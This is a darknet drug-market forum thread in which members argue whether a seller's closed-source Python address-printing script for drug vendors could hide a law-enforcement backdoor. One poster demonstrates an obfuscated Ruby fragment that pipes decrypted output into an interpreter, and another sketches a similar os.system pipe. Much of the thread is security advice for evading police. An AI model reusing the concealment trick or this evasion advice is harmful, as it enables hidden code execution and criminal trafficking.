E. Knows the language, since they wouldn't just look at that part of the code but would need to audit the entire thing
Such an exploit would be possible to spot if the program went through auditing, someone who doesn't know ruby is not going to look at my code and realize what is going on, they are going to see it doesn't have networking code included with it has no IP addresses or ports listed has no encrypted data included and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command.
Given the nature of os.system and struct in Python, I'd be surprised if it could be concealed as well as it can in Ruby. I could be wrong there, but I don't think so.
* My code does not require or use a network connection in any way (vendors an make their own decisions on whether or not to utilise an air gap).
Neither does the example code I showed, it gets the networking require from the decrypted ciphertext.
It still needs network access, though.
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it). This would pretty effectively stop an exploit checking address data from being used in a live system.
You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address.
Fair point.
So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement. It's one thing to to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.
I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes.
Which brings us back to proving it, which we've been round and round on. Your comment there wasn't merely pointing out what might be, it became an accusation at that point.
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine. Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile. It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.
Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.
Axtually, what you said in response to Limetless' question asking about your code and for proof of my engaging in some kind of deception was this:
And how does this relate to the person being accused.....
it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize | #{[105, 114, 98].pack("c*")} is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.
That pretty clearly states that because you thought of a way to conceal an exploit in a different language that therefore my code will 100% guarantee that users of it will be compromised.
That is a fallacious argument, the only purpose of which being to use in an ad hominem attack.
-
Let us make one thing perfectly clear. Air Gaps are a good idea on their security merits. The best in fact. This does not make them trivial to implement and operate in practice for one second. Nuclear scientists are not known to be especially stupid people, but the Iranian Air Gap for the nuclear facility was still breached. I am not suggesting that you need to be a government to run an Air Gap, but the failure of it to work despite being best practice does illustrate the practical difficulties of using Air Gaps. In practice, a vendor using your software + the Air Gap, would have spent so much of his or her time on the Air Gap with time/money that any advantage to your software would be rendered utterly useless.
I am not explaining that for your benefit Louis because you already know it. I am saying the above for anybody who might take your "simples Air Gap simples" as a legitimate answer.
You're making the assumption that data needs to be transferred bidirectionally across the air gap. The purpose of this software is to parse data in the SR order table and produce printed labels or envelopes. Once the data is transferred from the system accessing Tor and SR to one with no connectivity except to a printer, there is no requirement to transfer any data back at all.
Once the printing, packaging and posting is done the vendor just logs back into SR and updates the order status as normal.
-
I'd have to add a lot of code to achieve that with my current effort. There is no way to conceal that something was occurring between the decryption and the parsing of the decrypted data to produce a printable file. Especially not after stating that the bash command was just the GPG command (i.e. gpg --decrypt-files *.asc) and doing it in Python is this:
os.system("gpg --decrypt-files *.asc")
it seems to me that you could just do this instead
os.system("gpg --decrypt-files *.asc | some_(obfuscated?)_way_to_run_the_output_as_a_script")
although I am not sure if python comes with something like ruby's irb that would allow you to pipe a script to it to be immediately launched.
-
actually I don't think it will work with --decrypt-files because the output is handled differently, I think it it would indeed take more code to do it with that flag being used instead of -d.
-
Let us make one thing perfectly clear. Air Gaps are a good idea on their security merits. The best in fact. This does not make them trivial to implement and operate in practice for one second. Nuclear scientists are not known to be especially stupid people, but the Iranian Air Gap for the nuclear facility was still breached. I am not suggesting that you need to be a government to run an Air Gap, but the failure of it to work despite being best practice does illustrate the practical difficulties of using Air Gaps. In practice, a vendor using your software + the Air Gap, would have spent so much of his or her time on the Air Gap with time/money that any advantage to your software would be rendered utterly useless.
I am not explaining that for your benefit Louis because you already know it. I am saying the above for anybody who might take your "simples Air Gap simples" as a legitimate answer.
You're making the assumption that data needs to be transferred bidirectionally across the air gap. The purpose of this software is to parse data in the SR order table and produce printed labels or envelopes. Once the data is transferred from the system accessing Tor and SR to one with no connectivity except to a printer, there is no requirement to transfer any data back at all.
Once the printing, packaging and posting is done the vendor just logs back into SR and updates the order status as normal.
Splendid idea in terms of security, separating PGP public keys from PGP private keys on two different machines. But I've yet to hear from these hordes of Air Gap using vendors. They are a figment of your imagination so far as I can see.
Because you know, I thought this software was to aid the business of decrypting addresses, not upgrading the vendor's operation security to be using Air Gaps.
I'm pretty sure this only occurred to you inside this thread, you admit the use of Air Gaps was not part of the original plan, right? It's not in your advertisement anywhere. This was an afterthought. Is that something you're able to admit? If you're not going to update your advertisement it's just this thought experiment you had this one time.
Since using Air Gaps is so simple, your customers should have no trouble going over this new paradigm according to you. Amongst other things, I contest that, it's rather exotic thing you're expecting us to believe.
--
I cannot comprehend how your customers are expected to adopt tippy top best practices, when the real security vulnerabilities lie with trusting yourself. Your No.1 goal should be removing the necessity of trusting LouisCyphre and replacing it with cryptographic forms of trust from the outset.
-
Yep, I've demonstrated this a couple of times already. It's a function, though, Python doesn't have anything like Ruby's put command (no, I haven't learned the language, I just looked at the Wikipedia page on it).
just a wild guess but maybe something like printf("what to put \n") will work ;).
Which brings us back to proving it, which we've been round and round on. Your comment there wasn't merely pointing out what might be, it became an accusation at that point.
I never accused you of having a similar backdoor in your code, I only said "hey look, I guess not having networking code in the program isn't as strong of proof that it is not backdoored as you thought"
Axtually, what you said in response to Limetless' question asking about your code and for proof of my engaging in some kind of deception was this:
Which is 100% true. It is stupid to buy a script if you don't know what it is doing and it has not been checked out by enough people who can figure it out. If it is posted publicly anyone can check it out and any backdoor will be quickly found. I could ask a dozen people I know who know python to look it over and let me know if it is safe or not and pass that on to the forum. I am sure a lot of people here either know python or know people who do, and that they could do the same. I point out that it is not necessarily obvious if a script is capable of transmitting data over the internet, that is all that I demonstrated. Even you couldn't figure out what the script was doing until I correctly commented every line of it, it seem that you actually thought the initial bullshit comment I left explaining away the call to unpack was legitimate, even when I intended for my initial post to clearly demonstrate the backdoor. Do you think someone with no programming or command line experience is going to be able to find what was going on there, or will they think it looks innocent and be satisfied with the detailed if partially incorrect (intentionally so) comments I left?
That pretty clearly states that because you thought of a way to conceal an exploit in a different language that therefore my code will 100% guarantee that users of it will be compromised.
No I said 100% of users who use your software will not be able to identify something like the backdoor I demonstrated in a different language. Because if they could identify it they would program the tool themselves. The solution to keep everyone secure and happy, is to get donations for your work and let the code be publicly audited, because I guarantee you if I read the Ruby script I wrote but someone else had written it, that I would have noticed what was going on. Someone who knows Python but not Ruby looked at it and had a difficult time to figure it out even with most of it commented correctly, I think that goes to show that you should know the language well enough to audit code or be confident that others who know the language well enough to audit code have done so, before you run scripts from anyone.
-
There have been a lot of unfounded accusations thrown around these forums lately by quite a large number of people; many of these accusations are based on pure conjecture, and that is also the case here as there is no evidence to suggest or back up your claims that LouisCyphre is LE.
If you purchase the code and it does have malicious intent, you can stand behind your claim with proof.
Whilst it is of course possible that the copy you receive may be different than everybody else's, it is terribly foolish to make claims based on pure conjecture, especially claims as serious as this.
- grahamgreene
Graham, we are not playing by the same rules as regular civil society. We are criminals and we cannot afford to be playing by 'Marquis of Queensbury' rules or we will hang.
It is literally not possible to prove anything concrete on a forum of anonymous participants, since all you have is information from them. That does not mean you cannot red flag suspect behavior when it occurs.
Whilst I agree that we are not playing by 'Marquess of Queensbury' rules, given the nature of these forums it is entirely reprehensible to decry someone as being 'the enemy', without proof to back up that claim.
The fact that it is not possible to prove the claim is exactly my point - you made a statement of fact "Say hello to our resident LE Agent. Deciphering LouisCyphre." based on pure conjecture. You didn't "red flag suspect beahvior", you straight out called LouisCyphre a law enforcement agent.
I would of course consider it necessary to encourage users to remain cautious and view the product that he is offering with suspicion, and to seek independent verification that it contains nothing malicious. There are more diplomatic ways of doing that than by making a baseless claim that it's author and purveyor is the boogeyman. There is nothing stopping the buyer from releasing the code here on the forums for verification (which wouldn't give them much peace of mind as any or all of us COULD be LE), or indeed bringing it elsewhere for the same purpose.
A thread stating "A new product is up for sale which could possibly contain malicious code that could de-anonymize a vendor, and should be independently verified before use." would have been a far better solution than simply identifying someone as LE based on admittedly unverifiable assumptions.
Like I said already, if I am wrong, there is no real downside apart from Louis feeling aggrieved. The other option is that perhaps tens, hundreds, who really knows what number if nobody raised any alarm bells and it was popularized, of vendors go to the wall.
I hope that I am completely wrong. I did not post this thread, as some have said/implied, in some kind of angry ranting mood. In fact I thought about this for several hours before posting it. I realized the only thing that really prevented me from posting and calling out Louis outright was that we knew each other though PGP Club. Since this is an illogical rationale, I wrote to DPR expressing my concern and he thought the best thing would be to air these in public.
Granted the security benefits for the majority outweigh the personal negatives for LouisCyphre, however slandering his good (forum) name and reputation is entirely unnecessary given the alternative method outlined above. You admitted yourself that it is impossible "to prove anything concrete on a forum of anonymous participants". Given that fact, doesn't it seem rather outrageous to make a statement of fact based on conjecture?!
Furthermore, this is an agorist marketplace - as such, LouisCyphre is free to offer the product for sale, as is any buyer is free to buy it. Demanding that he release the code for review goes against the ideals of an agorist marketplace wherein individuals are free to market their wares without regulation or coercion. Forgive me for paraphrasing but you are essentially saying "Release the code for independent verification; if you don't, then you're LE."
I have no interest in this product, nor any interest in whether LouisCyphre is LE or not. If he's not, great. If he is, so be it. That does not take away from the fact that he is free to offer his wares in this agorist marketplace, which would seem to be a view that DPR shares as evidenced by telling you to "take it to the forum" rather than deciding to regulate the product / vendor in question.
You cannot deny freedom to a minority in order to guarantee freedom for the majority. It is simply wrong, and goes against everything that this place stands for.
I know something about computer hacking. I know more than I want to about law enforcement, that is where my certainty that this is a highly suspect, probable LE act comes from. If this is paranoia, is is most assuredly informed paranoia.
This is the equivalent of preventative medicine. Would you want doctors to wait until they are 100% certain it is a cancerous tumor, or do you wish them to cut it out, even if it later turns out to be entirely benign? Or maybe you want to give the strange unknown lump a fair shake. After all, you have not yet proven it is cancerous. This is a direct analogy, because if you are busted on SR, it will be like a disease removing years from your lifespan, they are likely to be heavily disproportionate since they cannot catch us all at once, and will attribute yourself as a 'prime mover', as part of a conspiracy. I mean that in the legal sense of the word. That is if somebody on SR commits a crime, then you are responsible for it. Sounds like something I'm making up I know, but I'm unfortunately not.
Paranoia, whether informed or not, has nothing to do with this. I would agree that it IS highly suspect, purely because of the fact that it may contain malicious code that may put a vendor's freedom at risk. Again, it "may". Not "does". Until we see the code, we have no way of knowing either way. I'm looking at this from a purely agorist perspective, pine; I completely agree with you that people should be warned of any potential security risks, but to state that someone is LE and should give away their product for free simply because it may be damaging should it contain something malicious is entirely unreasonable given the principles by which this market and this community operate.
So, those are the stakes.
A "middle of the road" perspective, where everybody has a point but nobody is completely wrong is a dangerous one. It makes LE agents into hypothetical creatures, which they most certainly are not. A lack of visibility on this is a key problem on this hidden service, kmfkewm has frequently noted this, it is detrimental to drug consumers, but positively lethal to drug suppliers.
There are two options before you: Louis Cyphre is a LE agent or he is not. Ignore his words after the incident, and examine his actual actions. What do you get?
I have put the probability at 70:30, which I think is more than fair. You can arrive at your own personal conclusions. I do not require other people to agree with me to change that ratio up or down, that would be fundamentally irrational when for all we know half the respondents in the thread could also be LE sockpuppets.
So in short, you don't get to change the title of *my* thread because you don't agree with me. That doesn't make sense. You can however make your own thread on this topic and call it whatever you wish.
A "middle of the road perspective" certainly doesn't make LE agents into hypothetical creatures; we all know that the risks are very real, and we all know that our enemies will stop at nothing in their efforts to throw bars around our freedom, but that is not a valid reason to abandon the principles of the very thing which we are trying to protect. When we abandon those principles we abandon the ideals behind them.
When I examine LouisCyphre's actual actions, I get an individual who wishes to sell a product which he has worked on and for which he is entitled to remuneration should he desire it. Nothing more, nothing less. I see the very real risk in implementing something which would have huge security concerns were it not independently verified, of course, but that is not something that concerns any of us further than strongly encouraging those who use it to do so with a security conscious mindset.
You're putting the probability that LouisCyphre is LE at 70:30. This is not probability, it is conditional probability based on a single assumed event which itself is conditional in nature. It is not unlike me stating that it is 70% likely that you are LE based on my hypothetical assumption that you're main function here is to cause dissent on the forums. As you would probably agree, a most baseless accusation.
I am not agreeing nor disagreeing with your personal conclusion, I am simply stating that you have arrived at entirely subjective result, not a factual one.
I don't want to change the title of *your* thread, I am simply asking you to reconsider its wording given the unprovable and slanderous statement it contains.
As I've stated before, I have a lot of respect for you for the huge amount of work you put in to the security aspect of this community and none of the above is a personal attack on you; however I cannot stand idly by whilst the very ideals of this marketplace are trod on in the interests of security.
To quote Benjamin Franklin: "They that can give up essential liberty to purchase a little temporary safety, deserve neither liberty nor safety."
As far as the following:
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by it's very regulatory nature is what powers the governments of today, and with them, their restrictive laws.
I think you just lost pretty much everybody here. Is this a postmodernist interpretation of capitalism?
That statement was a response to Limetless' somewhat tongue-in-cheek remark of "Nowt wrong with Capitalism. It's what drives progress. Bloody hippies." I was simply stating that I used to be a model capitalist before I experienced something of an epiphany after a number of personal life-changing events.
With even a cursory glance we can clearly see that the capitalist model employs regulation (the fact that it doesn't actually benefit from it is a topic for another day) and is the subject of constant government intrusion. We can also clearly see that the regulatory nature of capitalism powers the governments of capitalism based economies by giving them extensive influence over the markets and the people within those markets, thus the regulatory nature of capitalism directly affects the implementation of laws (such as drug prohibition due to extensive lobbying by certain interest groups etc.)
My declaration was simply a statement of my views as they currently stand, nothing more.
- grahamgreene
-
A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.
Easily proven wrong with SHA256 checksums. Actually, there's a point, better go and add that for the individual files.
Yes you should. But you didn't do this in the first place, if we believe that you are telling us the truth, then this thought has come to you in hindsight.
SHA sums only really help if getting code from multiple sources, to confirm that copies obtained elsewhere have not been modified after leaving the main distribution point.
Currently this code only has one distribution point. If it already contained an exploit, as you and Kmf are asserting is the case or is possible (respectively), then the hash of the file proves nothing. It only helps me if someone purchases the code, adds something dodgy and then posts that version to the forum.
That's the central troubling factor, that you have talked a great deal about security in the past and yet you made what many of us consider an elementary mistake.
As I said above, the SHA sums don't help users in this case, they just help me if someone tries doctoring the code as part of a framing effort. I added the hashing because after reading your tirades I realised that this was now a possibility.
When the issue of whether obtaining programs from anonymous people on drug forums is considered sketchy is brought up, your answer is that the vendors can audit the code, which as kmfkewm pointed out later in this thread, is fundamentally illogical because if they can audit the code then they can also write it themselves.
What I said was that I could explain precisely what every line does and provide links to online sources (e.g. docs.python.org) which showed I was not lying about those explanations. There is documentation on python.org and questions on stackoverflow.com which have examples which demonstrate multiple parts of the functions in the code.
*Pine talking about a way to deliver an exploit.
That's also how Anonymous got the kiddie fiddlers, by getting them to use an infected version of Tor Button.
The question rears its head again of why somebody who clearly knows about the dangers of exploits, would seemingly come up with a plan that bears a startlingly close resemblance to one. It is clear that you must either have malicious intentions, or a rather severe lack of introspection.
Or possibly I was as tired as I am now when I posted the listing. Which is possible, because I listed it, made a couple of posts to the forums and then went to bed. When I woke up this "charming" thread was waiting for me.
C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.
The code isn't that complex, I can step them through the essentials of what it does and then they can ask someone not connected to all of this whether I'm full of shit or not.
Red flags everywhere! I think it's already been pointed out, but you're strongly implying that they should trust your judgement. Which given our discussions on relying exclusively on cryptographic trust...
Not mine exclusively. That's why I made sure I could back up any explanation of what the code does with corroborating info on sites that are way beyond my control (e.g. python.org).
The focus of our concern is that you could be an able enough wordsmith for vendors to think: "yeah, that all sounds pretty legit, no need to get overly paranoid and get other people to test it, I'll just make a quick sweep of the forums and if everybody's happy it should be all good..." (the bandwagon fallacy, it's common to all investors in bubbles as well).
Well, I'd like to think I'm reasonably good at writing, but you didn't mean that as a compliment.
Of course you could (or not, we only have your word for it and your advert contains no caveats of this nature) advise they have somebody else audit the code to check Louis is not bullshitting them, but the real life situation is that
I'll grant that the listing needs a serious rewrite. For the moment there's a link to this thread on it.
A: Vendors are busy people.
Which, ironically, was the real motivation for my being approached to write it in the first place.
B: Most vendors don't know code (and as evident from this thread, some people think that open source automatically implies a near certain lack of backdoor exploits, which is hilarious were this not so serious when you consider that it is only open source to people who can't read the damn code in the first place, I mean talk about being a one eyed man in the valley of the blind!),
Yet you also argue that posting the code to a forum with, by its very nature, has less technically competent people able to audit it being a better solution. Go figure.
I am not convinced that posting any code on the forum would provide anywhere near the level of robust auditing that is available on the clearnet.
and C: this has gone unsaid so far, but it's important, that *they have already paid up for the software and they need to use it rightaway or they wouldn't have purchased it*.
You can always beat them to it and purchase it for a proper review. Hell, you could start a "prove LouisCyphre wrong" tip jar for that purpose.
This is practically the archetype of a situation in which somebody would sacrifice security for convenience.
Hmm, that's a good point. I'll have to see what I can do to try to offset that.
-
I'm far too tired to respond to all of these now, but I'll be back to do so after I've had some sleep. I did, however, want to address this right now.
Do you want to also post the rest of our communication surrounding that exchange? Because you missed the bit where I explain I have to go double check this thing. You'd think the smiley face emoticon would indicate an element of humor regarding my so called "accusation".
I do find it interesting you're storing decrypted messages though.
I do not store the decrypted messages. I store the encrypted ones so I can double-check things I might have missed. In fact, the bit you quoted showed that I had created a new file, put the ciphertext in it and then decrypted it.
Note the timestamp on the file and the timestamp on the message. You know I use Emacs to edit these text fields and you know it inherits the semi-chroot environment of Tor, so that timestamp is in UTC just like the forum posts.
As for the smiley, yes, at the time I thought you were joking. Right up until starting this thread. Then I had to consider the very real probability that you were not joking then.
Anyway, bed is calling me and I'll address your other responses (and no doubt a number more) upon my return.
-
"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"
LOOOOOOOL.
I'm sure Louis and his supporters will think this is a monstrous allegation, but I had the voice of Troy McClure from The Simpsons in my head when I read his advertisement and then when I wrote the above.
http://img01.lachschon.de/images/54679_troy_mcclure.jpg
Also bumping because how is this down five pages in just a couple of hours! If was general discussion it'd be still on page 1 or maybe page 2 for sure. Also the sticky section seriously needs tidying up here.
-
I strongly identify with Agorism, but one common theme I notice in many people who identify as such is that they let their ideological insistence on free markets and profit cloud their thinking. I actually notice this strongly when it comes to security software in particular. In many cases the best security and anonymity solutions are inherently free
...
Now I have nothing against people being paid for their resources, but from a security point of view I cringe at the idea of adding an entire unnecessary financial payment topology to an anonymity network. Now you need to anonymize the network traffic and the payment for the network traffic.
...
So Agorism is awesome and profiting from your work is awesome, but some things just do not mix well with profit unless you are extremely careful with how you go about it. You can donate cash to the Tor project and even to individual node operators in many cases. They do not make you pay to use their resources though. Truecrypt does not make you pay to use it, the source code is open and it is freely available for anyone to download and audit. At the same time they accept donations and make thousands of dollars.
...
We should not put the financial interests of vendors here above the security of everyone else.
Vendors who purchase this code are not going to go through it with a fine tooth comb because if they knew enough to do that then they would simply make the program themselves. We need to be practical when we think of situations like these, sure it is possible to run this code completely isolated and be one hundred percent safe. Are people going to actually do this? Probably not. It is almost a strawman to give arguments like this, because in reality the people who would purchase this are not going to isolate it they are not going to audit it etc. Even if the code is one hundred percent non-malicious it doesn't matter because if we don't point out that people should not buy restricted access software from Louis then we have no right to point out that people should not use restricted access software that is offered through SR (or anywhere else) at all. It has nothing to do with Louis as an individual or a vendor, it has to do with best security practices, and the best practice for security would be to not run scripts that 99% of people on the forum are never going to look at, especially when the 1% of people who will pay for them are certainly going to be the people who do not have the skills to audit them.
I agree with all those sentiments. I think there's a whole lot of apragamatic thinking going on this thread, people banging on about their "rights" and etiquette. They appear to have forgotten the government says they have the right to go to prison if they find you! This kind of thinking would be a one way ticket to the slammer if this was an RL black market. I think the forum/e-commence interface has given them a false sense of normality.
Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.
A fair enough point.
When you say "absolutely no evidence" (referring here to Graham I believe), that's not exactly true now is it.
What we have here is circumstantial evidence. Somebody acting in a suspicious way.
I agree this is not hard evidence, I said it wasn't scientific myself even. But you cannot get hard evidence when everybody is anonymous, it's next to impossible! This is an unreasonable standard to set. I mean, what do people want? So, unless I can find some LE document showing Name X also alias LouisCyphre is on the payroll or the equivalent, then it's not fair to accuse anybody of being suspicious?! If I had hard evidence, there would be *no* need to come onto the forum whatsoever with this thread! We'd just delete all LouisCyphre's stuff and ban him. Is this not true? You surely accept this, right?
Does that then mean that denouncing somebody on the forum is an illegitimate thing to do, forever and always? Because this is the implication of what I'm hearing here. If you need physical evidence and circumstantial evidence is non-admissible, then you have set yourself a really ludicrous standard for a black marketeer.
As an analogy, it is like you have taken a trip with your friends, it is drug transportation kind of deal across a long distance and you are all feeling nervous.
At a gas stop, when you come out after paying the fuel ticket, you see that one of your pals is reaching underneath the car, fiddling with something or other.
You then try to examine underneath the car yourself, because you think this behavior is mighty suspicious. Maybe it is a LE tracking device and your so called friend is actually a CI.
But your "friend" prevents you. Your friend says to you that you can't look under the car because you don't own the car. More suspicion. Now you really want to look under the car.
You query this, more than somewhat incredulous. He says, further to this, that anybody who looks under his car must either buy/rent his car, and that only mechanics who are also drug smugglers can buy/rent the car. You tell him relatively few drug smugglers are also mechanics, maybe he could have a LE tracking device underneath the car and nobody would notice. Indeed, any drug smuggler who was also a mechanic would almost certainly have his own vehicle to transport drugs with! Your "friend" informs you that this is ok, because he is a mechanic he will describe exactly what you are seeing, step by step, if you buy/rent his car.
But you are not sure this is legitimate. I mean, even if he explained everything about the underside of the vehicle, you can't be sure he doesn't know some sneaky hideaway place only experienced mechanics know about. Perhaps you've seen some sneaky ass shit for hiding stuff on "Border Watch", a LE propaganda show.
As such, you call to your other friends who were previously busy molesting the cola and candy counters in the gas station's shop, point to your mechanic person and tell them to watch his guy, he is acting suspect, could be a LE agent for sure, putting tracking devices under cars is practically a LE trope.
At this point your potential LE agent flips out and says all the drug smugglers who buy/rent his vehicle are going to drive the vehicle into a giant portable Faraday cage when they are using his car.
This seems unlikely to you, and you are not persuaded. Sounds like something the Army might do, bit far out.
You inform your other friends that they should only rent or buy cars to transport drugs in future from people who are unconnected to the trade e.g. a typical car dealership.
Meanwhile, your potential CI is fuming and claims you're paranoid as fuck, some manner of crazy bitch to go accusing him of being a LE agent.
Well... True dat. :D
You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.
It is not particularly outrageous. If someone here suggests that we all stop using Tor and start using their for profit VPN, I will be the first to claim that the person is likely a law enforcement agent, Agorism and individual profit be damned.
[/quote]
Pragmatism. Saving your ass since we crawled out of the primordial soup. :)
-
Pragmatism. Saving your ass since we crawled out of the primordial soup. :)
Paranoia, saving my ass since I first stole a candy, a kiss, a smoke, a day off, a bag of weed, a woman, a pill, an identity, a credit card, a mortgage, a business, a life.
Modzi
-
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.
This is junk. Just like your answer with the Air Gap.
Putting exploits into a JPEG file, or any binary for that matter, is many orders of magnitude more difficult than, just for example... merely giving somebody a program which contains an exploit directly.
This answer you gave, only makes sense to somebody who doesn't know security. That is what has concerned me over and over again, that all your answers sound good on paper to somebody who is less than knowledgeable about computer security e.g. most vendors.
It still makes better sense for LE to target vendors wholesale by using a method that they're all going to see or open than by placing a product which they may or may not purchase up for sale. For targetting a specific vendor then selling a product generally still isn't the way to go, the way to go there is to send them whatever the bait is directly.
My point with the JPEG example was not that it was easier, but that the strategy behind using one would be better for a wholesale attack targeting vendors.
Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.
It would still require access to a network.
Eventually yes, but it doesn't have to be on a live network or happen immediately.
Which is completely nullified when data only travels one way across the air gap.
SROPPy with an air gap is basically: order data on SR --> written to read-only media --> taken to unconnected system with printer --> data processed by SROPPy --> printed --> data destroyed.
if an exploit was used in the way I described,
Yes, both you and Kmf have thought up clever ways to be twisted bastards, but that doesn't mean that I implemented it.
it would bypass even an Air Gap to decrypt messages and SHA-1 checksum validation on data intended to be outgoing on the networked machine. It isn't really a technological attack, but a psychological one that depends on the vendor not noticing that some characters in his plaintext message have been substituted for other extremely similar characters in order to encode information.
It does, however, still require a bi-directional flow of data across a network. SROPPy only needs data from a network, it goes out to a printer (and eventually through the post in the form of a label or on an envelope).
The "TLDR;" is this. If you think an exploit must rely on a network ping or that a exploit will be visible if you're looking straight at it, then you're wrong. Exploits are nearly always based on a combination of 10% technology and 90% understanding human psychology, ever since the first viruses were invented.
Funny you should mention psychology. Have you heard of shadow projection?
This is not science fiction stuff, it's not especially difficult to do things like this. It is simple to avoid the entire issue by not using unaudited software from anonymous sources, such as your initial proposition Louis.
I'm still looking for a way to have the software properly audited without simply becoming your/SR code slave.
I'm also still interested to know if there are *any* other Python coders reading this forum. So far it only appears to be me, in which case posting the code doesn't result in an audit, it just results in me giving away my work for free.
*pine explains the idea of the character encoding exploit
I think you're misunderstanding what it does with encrypted data. It's simply writing encrypted messages to multiple files and then calling GPG to decrypt them all simultaneously.
You're implying we should take your word for it, that the program does what you say it does. You can "explain" what your program does all day long, but you could be lying. This really is kindergarten stuff.
"It does X" - person 1
"You could be lying for all I know" - person 2
"Let me explain how it all works" - person 1
"..." - person 2
I've already posted the entire decryption command, both the bash and Python versions. It's the same as running "gpg file.txt.asc" except for more than one file.
The only way I can think of to do something dodgy there would be similar to the JPG thing by inserting something which self-executes upon decryption (which would require customising the compression software and/or GPG prior to encryption). Mind you, executing that kind of attack wouldn't need something like SROPPy, it would just need sending a vendor an encrypted message.
Which brings us back to my earlier point, made multiple times now, that there are better vectors for attack if that's your aim.
That aim is not my aim and never has been.
-
To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.
Then don't buy it. I'm not forcing anyone to, it's their choice.
This is about security, not some kind of "quality control" issue. As many people can buy your software as they like, but they should be informed of how hazardous that proposition could be, hence this thread.
This thread isn't about investigating whether or not SROPPy is secure, that's merely a part of it. It's also about tarring and feathering me. If you'd just wanted answers you could have at least started with a PM, but you didn't, instead you went to DPR to get me shut down and when that didn't work you went for a public attack and smear campaign. Don't believe your own hype.
There are far better vector's for attack on this site than a handful of scripts that can be read before their run or run on a disconnected system.
Seriously, if I wanted to do that I'd be planting malicious code in a compressed file that was automatically loaded, like a JPG for example. Put it in an avatar and then make a post attacking a particular vendor to lure that vendor into an argument and force them to load it.
This is nowhere near as simple as you're claiming. Image based exploits exist. But if it was as trivial as you're implying, it would have already been done a long time ago indeed.
I never said it was trivial. I said the strategy behind that kind of attack makes more sense for the cops to employ than what you're asserting I've done by offering some code for sale.
Yes, there is, but I'm not forcing anyone to buy or use this. I am providing a product which some vendors may elect to purchase and use and others may choose not to. It's a free market.
This is.. beside the point. Forcing people to do things isn't even a possibility on here. This is a strawman argument, you're pretending my arguments are something other than what they are.
While you're pretending that I am someone I'm not and that my code is something it's not just because I don't do what you tell me to do.
I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.
One of which requires network access, which is not required by the program. One involves a false assumption about the use of cryptography in the script (it calls GPG *once* with a decryption command). The last requires planting a backdoor in any of the following: Python (probably already on your system, if it's compromised you're already fucked), Bash (same as Python), GPG (extensively audited already) or HTMLDOC (if you're worried, skip that part).
Once more, you are not even implying it here, you are saying it outright, that we should trust you. This is your original sin.
Original sin?! Oh please ... no one has to even trust me. All they have to do is hook up an old PC with no network connectivity and a printer if that's still a concern after buying it.
I seem to remember that your advertisement had *no* caveats about getting somebody else to verify the code against your claims. I seem to remember your advertisement had *no* caveats about using a checksum to make sure you didn't do a bait 'n switch with your program.
If I'd made a dodgy version of the code then all I'd have to do is post the hashes of the dodgy version which would, of course, then match when a user checked them. So that means sod all.
*Everything* you said about that only came after this thread. So we have no evidence you had any plans at all to perform any double checking of any kind whatsoever. Whether they would actually work isn't even the question, it's that you apparently thought vendors would merrily download your software without checking it was without exploitation. The vendor that acquired the code from you, if this vendor is actually indeed real and not just a sock puppet, if they did not carefully audit the code, then the vendor is either naive or an idiot.
Definitely not a sock puppet, they've been here for a lot longer than I have.
The only proof I can provide, though, is the payment I received for the proof-of-concept shell script which was posted earlier. That payment is here:
http://blockchain.info/tx/8adb275fdb11f82349e98adfcb34a17caea53091e48afbc46f3c0b9d9d4f0a43
This is the entire point of this thread. Depending on trust in a single anonymous person's judgement is a recipe for a complete catastrophe for your operational security i.e. Do not pass Go, go to Jail.
It doesn't even need trust, see above.
